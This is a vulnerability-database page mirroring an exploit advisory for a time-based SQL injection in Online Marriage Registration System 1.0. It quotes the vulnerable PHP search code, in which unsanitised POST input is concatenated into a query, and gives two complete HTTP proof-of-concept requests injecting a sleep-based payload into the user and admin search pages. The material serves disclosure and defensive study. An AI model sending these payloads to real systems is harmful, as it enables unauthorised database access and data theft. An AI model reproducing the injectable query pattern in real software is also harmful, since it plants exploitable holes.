Vulners
Lucene search
Online Marriage Registration System 1.0 SQL Injection
🗓️ 21 Dec 2020 00:00:00Reported by Raffaele SabatoType 
packetstorm🔗 packetstormsecurity.com👁 241 Views
`# Exploit Title: Online Marriage Registration System 1.0 - 'searchdata' SQL Injection
# Date: 12-21-2020
# Exploit Authors: Andrea Bruschi, Raffaele Sabato
# Vendor: Phpgurukul
# Product Web Page: https://phpgurukul.com/online-marriage-registration-system-using-php-and-mysql/
# Version: 1.0
I DESCRIPTION
========================================================================
A Time Based SQL Injection vulnerability was discovered in Online Marriage Registration System 1.0, in omrs/user/search.php and in omsr/admin/search.php. The request is authenticated but it is possible to register a new user account.
Following the vulnerable code:
$sdata=$_POST['searchdata'];
?>
<h4 align="center">Result against "<?php echo $sdata;?>" keyword </h4>
<table id="datatable1" class="table display responsive nowrap">
<thead>
<tr>
<th class="wd-15p">S.No</th>
<th class="wd-15p">Reg Number</th>
<th class="wd-20p">Husband Name</th>
<th class="wd-10p">Date of Marriage</th>
<th class="wd-10p">Status</th>
<th class="wd-25p">Action</th>
</tr>
</thead>
<tbody>
<?php
$uid=$_SESSION['omrsuid'];
$sql="SELECT * from tblregistration where RegistrationNumber like '$sdata%' && UserID='$uid'";
$query = $dbh -> prepare($sql);
$query->execute();
$results=$query->fetchAll(PDO::FETCH_OBJ);
II PROOF OF CONCEPT
========================================================================
## Request user
POST /omrs/user/search.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------197361427118054779422510078884
Content-Length: 320
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/omrs/user/search.php
Cookie: PHPSESSID=d2d3a2cf4e15491144954c85736ee5f2
Upgrade-Insecure-Requests: 1
-----------------------------197361427118054779422510078884
Content-Disposition: form-data; name="searchdata"
' and (select 1 from (select(sleep(5)))a) and 'a'='a
-----------------------------197361427118054779422510078884
Content-Disposition: form-data; name="search"
-----------------------------197361427118054779422510078884--
## Request admin
POST /omrs/admin/search.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------267799269040335247322746025522
Content-Length: 320
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/omrs/admin/search.php
Cookie: PHPSESSID=d2d3a2cf4e15491144954c85736ee5f2
Upgrade-Insecure-Requests: 1
-----------------------------267799269040335247322746025522
Content-Disposition: form-data; name="searchdata"
' and (select 1 from (select(sleep(5)))a) and 'a'='a
-----------------------------267799269040335247322746025522
Content-Disposition: form-data; name="search"
-----------------------------267799269040335247322746025522--
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
21 Dec 2020 00:00Current
0.6Low risk
Vulners AI Score0.6